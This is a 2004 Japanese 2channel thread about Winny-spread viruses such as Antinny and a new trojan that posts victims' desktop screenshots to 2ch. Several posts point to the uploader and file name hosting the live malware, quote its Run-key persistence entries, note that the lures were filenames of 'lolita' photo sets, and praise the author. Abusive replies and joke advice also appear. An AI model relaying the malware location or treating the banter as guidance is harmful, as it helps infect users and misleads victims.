04/09/20 13:34:18 01dHSg1r
キンタマ感染しても、ポート警告が多い等の理由でポート0設定にしてたら個人情報は流出しないのでしょうか。どなたか教えてください。
354:[名無し]さん(bin+cue).rar
04/09/20 13:38:41 UJu/s5IU
釣られてやんねーyo
355:[名無し]さん(bin+cue).rar
04/09/20 13:52:59 yI1sC6g8
>>353
正解
あんた神だね。
356:[名無し]さん(bin+cue).rar
04/09/20 14:04:06 N2iAbA40
【GBA】(GBA ツール)ポケットモンスタールビー&サファイア 時間変更コード(詳しい説明付き)これでやっと夜がきます.zip
サイズ51.851 2222a20a7e6851321f070b0c907a642d
上記をDLしてウイルスチェックしたのち、+説明.txtファイル(exeは付いてませんでした)を
開いたのですが、開けないみたいなエラーが出たので、極窓で確認したら判別不能と出たので
PC全体のウイルスチェックをしたのち、PC再起動させWinnyを起動させたら
1秒もたたずに落ちてしまいました。何度やっても同じで、ノード情報は全て消えてしまいました。
それ以外の情報は平気でした。
上書きだけでは復旧できなくて再度Winnyを入れ直したのですが、ウイルスでしょうか?
他にもファイルがあったのですが、いじってません。
一応報告しておきます。
357:[名無し]さん(bin+cue).rar
04/09/20 14:08:24 01dHSg1r
キンタマはUpFolder.txtを書き換えるけど
port設定までは変えないということですか。
358:[名無し]さん(bin+cue).rar
04/09/20 14:18:37 01dHSg1r
UNTINNYウイルスに感染した場合、ポート0にすると、
他人にウイルスファイルをばらまかなくてすむのでしょうか。
359:[名無し]さん(bin+cue).rar
04/09/20 14:31:12 pZ2jUMD0
スレリンク(download板:98番)
マルチ乙>>358
360:[名無し]さん(bin+cue).rar
04/09/20 14:57:33 SiszVWzf
見ろ
不用意にageるから肴にすらならねー有象無象が寄ってきたじゃねーか
361:[名無し]さん(bin+cue).rar
04/09/20 14:59:47 01dHSg1r
>>355
もう少し詳しく教えていただけませんか。
362:47
04/09/20 16:40:28 pmh0I04D
_,,. --- ,,_
,.-‐'''" ヽ
ノ ヽ
/ ,,,_,_ ヽ
{ ,vリjh!リjh!( ヽ, }
} / ,; ニ= =ニミ;、i {
{ j ,.ェュ , { rtェ 、 i ノ
{ Y ミ Yリ
!| y.-,_-)、 |ノ
'! ノ _, u 、ヽ !
! ''ニ' ' !
ト、 _,,,,,, イ
┌───┐ /| --- -' |ヽ,
│ 金子 勇 | ー'''{ | ノ | /''ー
├───┴────────────
│『AntiShare』の開発を要請する。
└───────────────
363:[名無し]さん(bin+cue).rar
04/09/20 16:44:19 joujhvUo
ウイルスの鑑定などはここでいいのでしょうか?
できれば下記の鑑定をお願いします。
!!(一般コミック) [二ノ宮知子] のだめカンタービレ 第04巻(別スキャン単頁).zip 28,205,885 ee32043b7fe7dd03f72b29052cc692a2
中身はこの漫画のJPEGファイルのほか、
「.exe」「ReadMe.html」「.folder」の三種のファイル。
UNTINNYでおなじみの組み合わせですが、当方のNortonSystemWorks2004が反応
しなかったので、新しい亜種ができたのかと。
(踏んでないので分かりませんが...)
また、JPEGファイルがシステムファイル扱いになっており、
フォルダオプションの「システムファイルを表示する」設定していないと見えませんでした。
364:[名無し]さん(bin+cue).rar
04/09/20 16:45:02 MjkRRq7r
>>358
まるちかまあいいや
ぽと0にしても、UPしないというわけじゃない
普通は相手からセッション開始してUPするのだが
nyのポト0は自分からセッション開始してUPするらしい
つまりポト0であろうが、うpするから拡散する
ぽと0同士はだめだろうけど
365:[名無し]さん(bin+cue).rar
04/09/20 18:05:43 01dHSg1r
>>364
ということは、ウイルスがポート設定まで
変えてしまうということですか。
366:[名無し]さん(bin+cue).rar
04/09/20 18:20:10 29BOiMd4
>>365
要は、「キンタマ踏んだけど、私のデータ流失してませんよね?」ってことか?
367:[名無し]さん(bin+cue).rar
04/09/20 18:23:05 TyAT+7N1
>>365
ウイルス関係なく
ポート0でもみんな普通にうpしてるってこと
368:[名無し]さん(bin+cue).rar
04/09/20 18:33:38 gy//M/pW
>356
よく意味がわからん
txtファイルらしきものが開けなかったということか?
テンプレの感染症状確認してみたか
>363
とりあえず捏造警告でも出しといてくれ
369:[名無し]さん(bin+cue).rar
04/09/20 19:19:39 01dHSg1r
>>366、367
そうです。ポート0にしてても感染するとupするのですか。
また、感染してなくてもポート0で普通のスピードでupしてるのですか。
370:[名無し]さん(bin+cue).rar
04/09/20 19:27:24 oM44BT6y
まぁageなくてもいいじゃないか
371:[名無し]さん(bin+cue).rar
04/09/20 19:34:59 gy//M/pW
>369
うp速度ははny見て自分で確かめろ
つーか>>367読んだ?
ぽと0でも
感染とか関係無しにうpはしてると言ってるじゃねえか
372:[名無し]さん(bin+cue).rar
04/09/20 19:52:54 01dHSg1r
分かりました。ウイルスに関係なくupされるのですね。
では、感染してもポート0設定は解除されないのですか。
373:[名無し]さん(bin+cue).rar
04/09/20 19:58:04 ZhyfpYqT
ぜんぜん話を聞いてねえな(w。
374:[名無し]さん(bin+cue).rar
04/09/20 20:04:18 X2VuaJN2
01dHSg1r
こいつ質問スレでも粘着して質問繰り返してるよ・・・・・
見事にスルー/放置されてこっちになだれ込んでるみたいだな・・・・・
スルー/放置することをお勧めする
by 総合質問スレ住人より
375:[名無し]さん(bin+cue).rar
04/09/20 20:09:41 6eHXzHXd
情報㌧クス
376:[名無し]さん(bin+cue).rar
04/09/20 20:23:41 gy//M/pW
>372
そんな症状は無い
おまえがどのウィルスのことを言ってるのか知らんが
既出のantinnyにそのようなことをするものはない
そういう症状があってもそれは亜種であり
俺の知ったこっちゃ無い
377:[名無し]さん(bin+cue).rar
04/09/20 20:30:08 t5Flw/k8
771 名前:名無しさん :04/09/20 20:23:00
キンタマ感染しても、ポート警告が多い等の理由でポート0設定にしてたら個人情報は流出しないのでしょうか。
どなたか教えてください。
こんなん見つけました
378:[名無し]さん(bin+cue).rar
04/09/20 20:30:19 +pzCupw3
01dHSg1rは脳内が感染してる模様です。
379:[名無し]さん(bin+cue).rar
04/09/20 20:32:28 SiszVWzf
sageも出来ん厨は放っとけ
どーせ後20日ぐらいの命なんだからw
380:[名無し]さん(bin+cue).rar
04/09/20 21:58:26 5G7BbgQX
/|:: ┌───┐ ::|
/. |:: | | ::|
|... |:: | キンタマ .| ::|
|.... |:: | | ::|
| |:: | | :: |
|.... |:: └───┘ ::|
\_| ┌──┐ .| ∧∧
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( _)
/ ̄ ̄ ̄ ̄ ̄旦 ̄(_, )
/ \ `
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|、_)
 ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄
| .( ( |\
| ) ) ) | | .|
|________(__| .\|
/― ∧ ∧ ―-\≒
/ ( ) \
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
|______________|
∧∧
( ・ω・)
_| ⊃/(___
/ └-(____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
<⌒/ヽ-、___ <シクシク
/<_/____/
381:[名無し]さん(bin+cue).rar
04/09/20 23:49:32 MII97qGv
なんかやられたぽいけどどうしていいかわからん!
やばいね。。。。
382:[名無し]さん(bin+cue).rar
04/09/20 23:57:41 QpxhU4DL
脳細胞が?
383:[名無し]さん(bin+cue).rar
04/09/21 00:01:26 PeBObryp
>>381
あきらめればー
384:[名無し]さん(bin+cue).rar
04/09/21 00:17:51 zzCMoBJp
>>381
ん?アップフォルダーにJPGとか勝手に出来てるの?
385:[名無し]さん(bin+cue).rar
04/09/21 00:24:24 QYcixn2/
>>381
気にしない、気にしない。
人間も風邪ひくだろ。たいていは、ほうっておいたら直る。
誰もキミなんか興味ないって。
386:[名無し]さん(bin+cue).rar
04/09/21 00:58:34 26jKQ6TK
ぬるぽに感染したらもう入れ直すしかない?
387:[名無し]さん(bin+cue).rar
04/09/21 00:59:48 Am6yVj5+
>>386
気にしない、気にしない。
人間も風邪ひくだろ。たいていは、ほうっておいたら直る。
誰もキミなんか興味ないって。
388:[名無し]さん(bin+cue).rar
04/09/21 01:00:57 NQ2ccG6A
うn
389:[名無し]さん(bin+cue).rar
04/09/21 01:05:02 ewgN3Zaq
こいつら情報スレで質問するのかorz
390:[名無し]さん(bin+cue).rar
04/09/21 04:18:44 1AgtokjT
WinRARでzipファイルの中身を覗こうとしたら
「予期しない書庫の終わりです」って出る時がありますが
zip偽装のウイルスだったってことはありえるんでしょうか?
391:[名無し]さん(bin+cue).rar
04/09/21 04:22:46 Ob38LuoD
NGID:1AgtokjT
392:[名無し]さん(bin+cue).rar
04/09/21 04:41:18 A/77/Zjy
>>390
死ねばー
393:[名無し]さん(bin+cue).rar
04/09/21 07:20:26 gkeWQVJo
自動実行(窓の手で確認)に「NvCplDaemon」というのが入っているのは正しいのでしょうか?
ウイルスでランダムに作った名前にも思えるのですが自分では判断出来ません。
(いろいろアップデートした後ぐらいに見つけた)
ノートン(LiveUpdata済)で完全スキャン、オンラインスキャンしても未検出でした。
テンプレに書いてあることも確認しました。ウイルスらしい現象は起きてません。
教えてください、お願いします。
394:[名無し]さん(bin+cue).rar
04/09/21 07:39:00 OTnuHmca
>>393
個別環境依存なものについては、それが入っていようがいまいが、正しいも正しくないも無い。
それが疑うべきものか否か知りたいなら、自動実行されるファイルの実体が何かを調査確認すれば良い。
そのくらい自分でやれ。
395:[名無し]さん(bin+cue).rar
04/09/21 08:19:02 0LVQliwh
>>363
みつけた以上は、ちゃんと踏んでよ。
問題の「.exe」は、FFFTP.exe。無害。
!!(一般コミック) [二ノ宮知子] のだめカンタービレ 第04巻(別スキャン単頁).zip 28,205,885 ee32043b7fe7dd03f72b29052cc692a2
396:[名無し]さん(bin+cue).rar
04/09/21 08:34:22 LErTzGQS
>>393
nVIDIA系グラボの管理ツール
397:[名無し]さん(bin+cue).rar
04/09/21 08:53:34 GIP/dP7o
>>393
心配なら、VGAドライバを削除しなさい。
398:[名無し]さん(bin+cue).rar
04/09/21 19:01:12 h+5OsQ8n
Antinny.Gってsvchost.exeに関係した症状出る?
タスクマネージャー開いたらsvchostがいっぱい起動してて怖いんだけど、
これは普通のことだろうか?
399:[名無し]さん(bin+cue).rar
04/09/21 19:08:46 CINLeBhc
>>398
URLリンク(www.trendmicro.co.jp)
一応関係した症状出すみたいだが、svchostはいくつかあってもおかしくは無い。
漏れも4つほどある。
400:[名無し]さん(bin+cue).rar
04/09/21 19:25:02 rBc6YMGm
Autorun+batに感染してしまって早速テンプレの駆除方法を試そうとしたのですが
マウントした際に焦って脊髄反射でファイルを消してしまったんです。
この場合どう対処したら良いのでしょうか?ご教授お願いします。
401:398
04/09/21 19:29:16 h+5OsQ8n
サンクス。俺は6つ。
うーん、一通り駆除はしたんだけどなんか不安だからシステムの復元は無効にしとこうかな。
そっちのほうが危ないかな。
402:[名無し]さん(bin+cue).rar
04/09/21 20:02:14 uyZ9F6OJ
(ドラマCD)爆裂天使 SUIT CD-3 “天”Amy-11.lzh ed74776ae946eb13f3bf08c125cf21b1
解凍したら3つもexeファイルが。 あぶねーあぶねー
403:[名無し]さん(bin+cue).rar
04/09/21 20:40:10 3WF2fKD3
嘘偽りなく爆裂天使だったと
404:[名無し]さん(bin+cue).rar
04/09/21 20:43:02 k431Nsjg
しかし地獄行く。
405:[名無し]さん(bin+cue).rar
04/09/21 21:09:34 YJeLXY2I
もうなんのスレなんだかワカラネ
406:[名無し]さん(bin+cue).rar
04/09/21 21:47:23 vd9Wwl8A
いままで拡張子がlzhのファイルってまともなのみたことないんだけど
ていうかすでに.lzhで無視リストにいれてるな
407:[名無し]さん(bin+cue).rar
04/09/21 21:49:31 nBwO3wnF
ウィルス雑談&相談スレッドつくるか、あきらめる化だな。
408:[名無し]さん(bin+cue).rar
04/09/21 22:06:21 YrabcswT
作ったところであまり意味はなさそうだな
亜種に感染したときに一番簡単で安全な対策が再インスコだからな
既出のはトレンドマイクロやシマンテック見てわからんかったらあきらめろでいいし
409:[名無し]さん(bin+cue).rar
04/09/21 22:16:23 cnhAAVmy
>>400
自分が落としたと思われるエロゲーを再度落としてみて、確認してみれば?
410:[名無し]さん(bin+cue).rar
04/09/21 22:50:33 UiYxUKH4
>>395
最近のFFFTPには女性の悲鳴みたいなWAVEリソースが埋め込まれているのか?
411:[名無し]さん(bin+cue).rar
04/09/21 23:17:25 3lHKQVDf
「CROSS†CHANNEL NOCD化パッチ」というファイルをDLしてexeを起動したら
妙なカウントが30くらいから始まって急いで消そうと頑張るのだがキャンセルボタンは近づくと逃げました。結局強制終了でなんとかなりました
それはウィルス等の類ですか?↑分かりにくい説明でしたがカウントが0になるとどうなるかとか教えてください
乱文すみません
412:[名無し]さん(bin+cue).rar
04/09/21 23:22:15 44EMXIte
>>411
ばーか
413:[名無し]さん(bin+cue).rar
04/09/21 23:22:23 uQLhGl2H
>>411
は?NOCD化パッチなんだからNOCD化されるに決まってんじゃん
おまえバカ?
414:[名無し]さん(bin+cue).rar
04/09/21 23:25:53 rBc6YMGm
>>409
ありがとうございます。盲点でしたw
大分テンパってたせいか気付きませんでした。
そうか、もう一回ウイルスを落とせばいいんダ。
415:[名無し]さん(bin+cue).rar
04/09/21 23:26:54 FI5JQism
>>412
駒田の真似か?
416:[名無し]さん(bin+cue).rar
04/09/21 23:32:42 NQ2ccG6A
止めようとしてキャンセル(と書かれたボタン)押そうとした時点で
お前はnyやるレバルじゃない
417:[名無し]さん(bin+cue).rar
04/09/21 23:33:41 NQ2ccG6A
っつーかカウント0前に強制終了しようとしまいともう既に手遅れかと
418:[名無し]さん(bin+cue).rar
04/09/21 23:34:44 YrabcswT
>411
もうどうしようもない
不安ならさっさと再インスコしろ
419:[名無し]さん(bin+cue).rar
04/09/21 23:57:42 bwzqiaf3
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnキンタマ
420:[名無し]さん(bin+cue).rar
04/09/22 00:13:32 yTZI13Ma
現在でてるANTINNYウイルス(亜種も含む)で、デスクトップ上の
マイドキュメントやゴミ箱からも情報をとるものはあるのでしょうか。
421:[名無し]さん(bin+cue).rar
04/09/22 00:29:39 GLE7KMbZ
ageruna baka
422:[名無し]さん(bin+cue).rar
04/09/22 00:29:42 XeEl/z1A
わからない。たとえあったとしても…
とられてこまる情報をマイドキュメントなどに保存する愚か者はこのスレにいないので問題ない。
423:[名無し]さん(bin+cue).rar
04/09/22 00:39:44 tsO6tEnU
おい、そんな事言ったら>>420がかわいそうだろ
424:[名無し]さん(bin+cue).rar
04/09/22 00:43:45 zxSY1Bfi
すみませn
antinny.hってどんな症状なんすか??
知ってる人おしえてください
425:[名無し]さん(bin+cue).rar
04/09/22 00:44:03 y92j+6hG
>>416
「レバル」 ってなんですか
426:[名無し]さん(bin+cue).rar
04/09/22 00:44:10 iDhsW6nH
「俺のマイピクチャ」まだーー?
427:[名無し]さん(bin+cue).rar
04/09/22 00:48:48 BSHES9c3
>>420
>>424
おまえの質問に答えること それ自体は容易い 簡単だ
感染した時の症状はこれこれこう こういう問題が起き
何時間後発動し 隔離は・・・・・・? 駆除は? 再インスコは・・・・?
そんな話はいくらでもできる
しかし 今 俺がそんな話を 仮にしたとしても
その真偽はどうする・・・・・・?
真偽などどうでもいいから 聞きたいというのか・・・・?
ククク・・・・・・
すでにこのスレに書き込んでいるおまえには オレの話の裏をとる術はない
オレが何を語ろうと 結局ただそれを 盲目的に信じるしか道はない
つまり どんないい話を聞いても それは単なる気休めにしかすぎないってことだ
違うか・・・・・・?
428:[名無し]さん(bin+cue).rar
04/09/22 00:51:46 tsO6tEnU
>>426
よし、俺が流してやる
429:[名無し]さん(bin+cue).rar
04/09/22 00:53:30 zLHcnXpB
>>425
え?レバル知らないの?
ちょっと君 やばいな
公安にマークされるよ
430:[名無し]さん(bin+cue).rar
04/09/22 01:04:53 IONPryem
>>425
((((((;゚Д゚))))))ガクガクブルブル
431:[名無し]さん(bin+cue).rar
04/09/22 01:46:54 8QR9/+v0
>>402
.exe入ってるファイルなんて山ほどあるんだから、
「これに.exe入ってました」という報告はイラネ
ちゃんと実行させてから来い
432:393
04/09/22 02:06:37 3vM35NCY
>>396-397
情報ありがとうございます。
一応アンインストールして入れ直してみます。
>>394
ごめんなさい。
433:` ◆NgatoX7m1.
04/09/22 02:31:33 HYd9vI3J
「exe」←コレ、なんて読むのぉ?
イグジ??
434:[名無し]さん(bin+cue).rar
04/09/22 02:45:20 DFcwEF7M
いーえっくすいー
435:[名無し]さん(bin+cue).rar
04/09/22 02:46:46 cHFtlyXw
エグゼだろ
436:[名無し]さん(bin+cue).rar
04/09/22 02:49:11 vbBsFXrI
ロックマン?
バルドフォース?
437:[名無し]さん(bin+cue).rar
04/09/22 02:58:06 ETFJAFZu
>>433
.avi 読み方: エー ブイ アイ
.bmp 読み方: ビーエムピー
.exe 読み方: エグゼ
.gif 読み方: ジフ
.html 読み方: エイチ ティー エム エル
.jpg 読み方: ジェイペグ
.mpeg 読み方: エムペグ
.pdf 読み方: ピー ディー エフ
.wav 読み方: ワブ
.zip 読み方: ジップ
URLリンク(support.microsoft.com)
438:[名無し]さん(bin+cue).rar
04/09/22 03:01:32 zVcTvScF
>>437
>.gif 読み方: ジフ
>.wav 読み方: ワブ
ギフ、ウェイブだと思ってたOTL
439:[名無し]さん(bin+cue).rar
04/09/22 03:04:42 cHFtlyXw
別にウェイブでもいいだろ。
.bmpとか普通にビットマップって読んでるしな
440:[名無し]さん(bin+cue).rar
04/09/22 04:20:17 xUMasHO2
>exe 読み方: エグゼ
「エグいぜ!」 と読んでいた・・・
441:[名無し]さん(bin+cue).rar
04/09/22 04:34:30 MVU/5bip
>.exe
ここの方言では「ういるす」と読む。
あまり知られてないようだが・・・
442:[名無し]さん(bin+cue).rar
04/09/22 04:52:00 zLHcnXpB
>avi 読み方: エー ブイ アイ
俺は「アヴィ」と呼んでた。決して「アビ」ではない。
言っておくが唇は血が滲むくらい噛んで読めよ。
443:[名無し]さん(bin+cue).rar
04/09/22 05:15:36 mrLzYwy8
口内炎になっちゃいます。
つーかもうなりました。
俺の場合、アヴィとビットマップとウェーブくらいかな、違うところは。
444:[名無し]さん(bin+cue).rar
04/09/22 05:29:48 F/drtkw3
>>443
房黙
445:[名無し]さん(bin+cue).rar
04/09/22 08:34:56 GLUesFjZ
イグゼと読んでるなあ
あとギフでもいいはず
446:[名無し]さん(bin+cue).rar
04/09/22 11:14:24 j/18rTjQ
岐阜みたいでナウい
447:[名無し]さん(bin+cue).rar
04/09/22 13:29:49 jzo10T46
お 君はヤングだね おいらもヤングさ フィーバーしようぜ!
448:[名無し]さん(bin+cue).rar
04/09/22 13:38:57 Xh7RFvqN
岐阜はナウでイカス
449:[名無し]さん(bin+cue).rar
04/09/22 14:06:07 ukACuFTt
>>437
M$もわざわざそんなもん作ってんだねw
exeをエグゼってのはなんかゲームの世界みたいだな・・・
450:[名無し]さん(bin+cue).rar
04/09/22 14:22:35 CiebCEfA
aviはアビだろ
451:[名無し]さん(bin+cue).rar
04/09/22 14:38:05 3USje0wW
UINGUGANDAMU
452:[名無し]さん(bin+cue).rar
04/09/22 14:55:20 9gdQfsyR
PC初心者板じゃないんだからほどほどに
453:[名無し]さん(bin+cue).rar
04/09/22 15:05:05 dQ12lTaF
じゃあお前らexeをかなで打ってみろ
えぇ
454:[名無し]さん(bin+cue).rar
04/09/22 15:05:16 WgF4Qzwt
感染してからここに駆け込んで助けを求める初心者がいるがなー。
455:[名無し]さん(bin+cue).rar
04/09/22 15:18:16 G5rN2r09
スレリンク(musicnews板:15-18番)
これってshare利用者を狙ったウイルス?
456:[名無し]さん(bin+cue).rar
04/09/22 16:26:42 9wErnaQd
>>455
513 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:04/09/22(水) 05:09:53 ID:IJUa2BF4
【OS】Windows XP SP2に2種類の脆弱性
スレリンク(pcnews板)
特撮エロを
スレリンク(download板)
次世代共有PS2ソフト“食卓塩”開発
スレリンク(download板)
【本物】WINNYお宝ファイル真贋スレ【偽物】
スレリンク(download板)
エロゲー板ローカルルール申請
スレリンク(operate板)
一般海外生活板ローカルルール申請
スレリンク(operate板)
【あわや】OFF板コテが20娘をナカ出しハメ撮り【妊娠】
スレリンク(festival板)
【植物】ケチャップ用トマトの甘味遺伝子LIN5について
スレリンク(scienceplus板)
初級ネットワーク板ローカルルール申請
スレリンク(operate板)
被害者100名強
やっちゃってないか心配な人へ
list.zip 5,728 6b1ab91ddc26ac315a5592098cc4d806db9a476c
457:[名無し]さん(bin+cue).rar
04/09/22 16:28:15 pfnybTQU
>>455
ここはnyスレだぞShareはほっときゃいいんだよ。
どうしても聞きたいんならShareスレへ池。
458:[名無し]さん(bin+cue).rar
04/09/22 16:36:01 jzo10T46
>>454
でも そのny初心者うぃ~虐めるんで、寄り付かなくなってるし・・・
459:[名無し]さん(bin+cue).rar
04/09/22 16:59:26 9GkE2lGq
ヌルポースもおさまり、とくに新種も亜種もでてないんだから
スレが死んでてもかまわない
今更キンタマに感染しました~っていうのを聞いててもしょうがないだろ
460:[名無し]さん(bin+cue).rar
04/09/22 17:17:22 jzo10T46
でも大抵 質問してくるのは指摘通りの新種、亜種以外なら圧倒的に
初心者による既存ウイルス被害者だろ?
したがって散々既出とはいえ、敷居を高くしすぎるのもどうかと思ったんだよね。
質問に答えるかどうかは あくまで善意と個人の資質の問題だからさ。
いやなら無視していればよいわけだし・・・
無駄レスの可能性があっても それは許容していったほうがよくね?
もっとも速報系スレなら まずいだろうけどさ。
461:[名無し]さん(bin+cue).rar
04/09/22 18:38:20 DD8VmRNY
>>453
いさい
462:[名無し]さん(bin+cue).rar
04/09/22 19:18:30 jIZTPKHy
久しぶりにダウン版来たけど
ウィルスやらなにやら大変になったねぇ・・・
463:[名無し]さん(bin+cue).rar
04/09/22 20:00:51 6gk9JVQ6
そろそろ面白いことになるから覚悟しとけよおまいら
464:[名無し]さん(bin+cue).rar
04/09/22 20:08:02 AmnzJVzB
犯罪予告ディスカ?
465:[名無し]さん(bin+cue).rar
04/09/22 21:17:01 bZGJWpm+
感染するとデスクトップをキャプされて、それを定期的にうpロダにあげて、
その画像へのリンクを特定スレに自動書き込みするウィルスが
はやってるらしい。みんな気をつけて!
エロアニメ動画をみている状態のデスクトップとか晒されててワロタ
キャプチャされたデスクトップがウィルスによって晒され続けてるスレ
角二 【うpろだ】アップローダー案内所11【アプロダ】
スレリンク(ascii2d板:192番)-
関連スレ
セキュリティ板 ウィルス情報&質問 総合スレッド☆Part24
スレリンク(sec板:412-番)
キンタマのWeb版みたいなもんなの?
466:[名無し]さん(bin+cue).rar
04/09/22 21:35:46 9rRhf0vV
>>465
こりゃ最凶だ
467:[名無し]さん(bin+cue).rar
04/09/22 21:36:30 XwcsDIdF
キンタマ改造版だな。
節穴機能が付いてないだけましか。
そのトロイどこかで入手できないもんかなァ。激しく解析してみたいぞ(w
Webとかjpeg感染タイプが出てくると、結構脅威だろーな。
nyだけじゃなくて、世界的に笑える
468:[名無し]さん(bin+cue).rar
04/09/22 21:37:25 koLWP3nB
これスレが新しくなっても自動書き込みするようになってるんだな…
469:[名無し]さん(bin+cue).rar
04/09/22 21:40:54 yMfO9itd
>>467
ほれ
つURLリンク(strawberry.web-sv.com)
中身はロリータ写真集だw
470:[名無し]さん(bin+cue).rar
04/09/22 21:41:25 Fk55VY7i
>>467
苺のアプロダ・1MBの1360.zipがウイルスだ
471:[名無し]さん(bin+cue).rar
04/09/22 21:42:01 JgXMRF3E
>>460
答える人に対しては誰も文句は言ってないはず。
質問に答える意欲と知識を持った人が質問に居合わせれば
今までもどんな駄レスにだって普通に返答はあった。
何でもオーライな空気なんて百害有って一利無し。必要ない。
472:[名無し]さん(bin+cue).rar
04/09/22 21:43:34 XwcsDIdF
しかし、新スレ追跡してるけど、強力だなぁ…
何に埋められてるんだろ。ほしいぃ
473:[名無し]さん(bin+cue).rar
04/09/22 21:49:41 fz84/HQL
up.isp.2ch.net/upload/c=03okari/index.cgi
ここで直接見れるよ>キャプ
474:[名無し]さん(bin+cue).rar
04/09/22 21:50:31 XwcsDIdF
469-470
サンクスコ、解析してみる。
ご親切に、フォルダアイコンになってるね。
バイナリエディタで覗いてみただけでも、相当作りこまれてるのがわかる
「そんなスレッド/板ありません」を検知して、別スレに飛ぶ機能もある
おーい、こいつメール砲機能あるみたいだぞ
キンタマ亜種とか改造版じゃなくて、まったく新規に作ってるっぽいな。
しかも、かなり念入り。詳しくはもうちょっとお待ちを…
475:[名無し]さん(bin+cue).rar
04/09/22 21:51:07 6gk9JVQ6
432 :名無しさん@お腹いっぱい。 :04/09/22 21:44:41
>>412
169 :名無したん(;´Д`)ハァハァ :04/09/22 21:39:41 ID:LP+Ly6X1
23 :名無しさん@ゴーゴーゴーゴー! :04/09/22 21:37:54 ID:kcrfEebX
実行結果:
追加されるファイル:
windows\shellsystem.exe 678kB
追加されるレジストリ:
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
476:[名無し]さん(bin+cue).rar
04/09/22 21:53:32 XwcsDIdF
ちなみに、ノートン先生最新版では検出せず。
すぐに回線切れよ>かかった香具師
477:[名無し]さん(bin+cue).rar
04/09/22 21:54:19 MORRrkle
>>474
フォルダと思ってWクリックしたら、exe実行ですか・・・。
解析乙です。報告お待ちしてます。
478:[名無し]さん(bin+cue).rar
04/09/22 21:54:33 9rRhf0vV
これって、shareフシアナ晒しage→shareクリップボード晒し→苺デスクトップ晒し
って進化?していったのか?
479:[名無し]さん(bin+cue).rar
04/09/22 21:58:33 TGFooCp8
>>478
同時多発っぽい
480:[名無し]さん(bin+cue).rar
04/09/22 21:58:58 F8v+LexZ
すげーな作者!GJ!
481:[名無し]さん(bin+cue).rar
04/09/22 21:59:18 0Y8OIFWt
Shareのってうさんくさいパッチあてるとなるやつか?
482:[名無し]さん(bin+cue).rar
04/09/22 21:59:25 zRg+AmZG
一度流れたら半永久的に削除不能なキンタマに比べたら救いがある?
483:[名無し]さん(bin+cue).rar
04/09/22 22:00:56 vLbTjc4V
>>479
2ちゃん同時多発テロか?
484:[名無し]さん(bin+cue).rar
04/09/22 22:02:59 zasm0Yrz
exe圧縮してないからバイナリエディタとリソースエディタで
中見られるな。
これ改造も容易だし、亜種出回りそうだな。
ウイルスチェッカー制作企業とかに報告が行けばいいが。
485:[名無し]さん(bin+cue).rar
04/09/22 22:03:06 F8v+LexZ
この作者の優しいとこはうpロダをわざわざ2CHロダにしてくれたとこだな。
ここ消せないけど2chプロバイダ入ってないやつは24時間で見えなくなるし。
あやしいわーるどのうpロダとかに画像うpされるようになったら最悪じゃない??
あそこって結構長持ちだし自分で削除できないしime.nu経由で開いたらブラクラになるんでしょ??
作者見てる~?
486:[名無し]さん(bin+cue).rar
04/09/22 22:03:33 WK8P1uKu
おまいらって、初心者には厳しいが新種にはホントに嬉々とするよな(・∀・)
487:[名無し]さん(bin+cue).rar
04/09/22 22:04:59 tOdOsShM
>>482
誰かが纏めたのをnyに流しそう
488:[名無し]さん(bin+cue).rar
04/09/22 22:07:17 0Y8OIFWt
感染源はどこなんだ?
489:[名無し]さん(bin+cue).rar
04/09/22 22:08:11 OFqE6GX2
私は苺で違法ダウンロードばかりしている犯罪者です
スレリンク(news板)
【洒落】キンタマウィルスのWeb版
スレリンク(news板)
490:[名無し]さん(bin+cue).rar
04/09/22 22:08:31 1t6CyIj6
だれか単独スレ立てろ
491:[名無し]さん(bin+cue).rar
04/09/22 22:11:39 oYMFNm7J
それにしても何でこんな大勢がクリックしちゃったワケ?
そんなに魅力的なファイルだったのか?
492:[名無し]さん(bin+cue).rar
04/09/22 22:12:35 F8v+LexZ
(写真集)(ロリータ)水原友里
(写真集)(ロリータ)相田加奈子
(写真集)(ロリータ)河瀬菜美
ってファイル名だったらしいよ
493:[名無し]さん(bin+cue).rar
04/09/22 22:12:41 g1+bfA34
ロリファイルは大人気でしょう
494:[名無し]さん(bin+cue).rar
04/09/22 22:14:27 JgXMRF3E
>>491
トリビアスレにファイルのリンク貼った奴がいたみたいだが
495:[名無し]さん(bin+cue).rar
04/09/22 22:14:47 IuQLM0ec
>>491
>>469
496:[名無し]さん(bin+cue).rar
04/09/22 22:15:17 zasm0Yrz
>>492
正確にはその全ての尻に.exeがついていたがな。
エクスプローラーの設定で、拡張子見えるようにしておかない奴らが
いかにも踏む感じの奴だった。アイコンがフォルダだったし。
497:[名無し]さん(bin+cue).rar
04/09/22 22:15:52 lbxNYg0M
URLリンク(strawberry.web-sv.com)
の中にある EXEのフォルダをクリックしたら感染
注意!('A`)9m
498:[名無し]さん(bin+cue).rar
04/09/22 22:16:46 cHFtlyXw
俺でさえも(ry が予兆だったって事?
499:469
04/09/22 22:17:05 yMfO9itd
>>495
スマン
俺は別に引っ掛ける気は無かったんだが、
>>467へのレスなわけだし。
結局おまいも、引っかかったんだろ?
500:[名無し]さん(bin+cue).rar
04/09/22 22:17:29 IuQLM0ec
10 名前:番組の途中ですが名無しです:04/09/22 22:09:56 ID:VXSuEMJY
これと同じウィルスが数日前に放尿スレにあったんだよな。
ノートンで検出されないってのは怖いな。
767 名前:私は放尿絵で興奮する変態です[G4zsGnQECv:40回目] 投稿日:04/09/18(土) 15:10:02 ID:GhekIZuS
URLリンク(v.isp.2ch.net)
501:[名無し]さん(bin+cue).rar
04/09/22 22:17:30 EQvNm7YP
これ苺とかってアプロダに上げられた>>469から感染したんだろ?
K札動けばアップした奴(から作者まで)の特定が可能なんじゃね?
502:[名無し]さん(bin+cue).rar
04/09/22 22:19:48 3zEu3lCZ
>>497
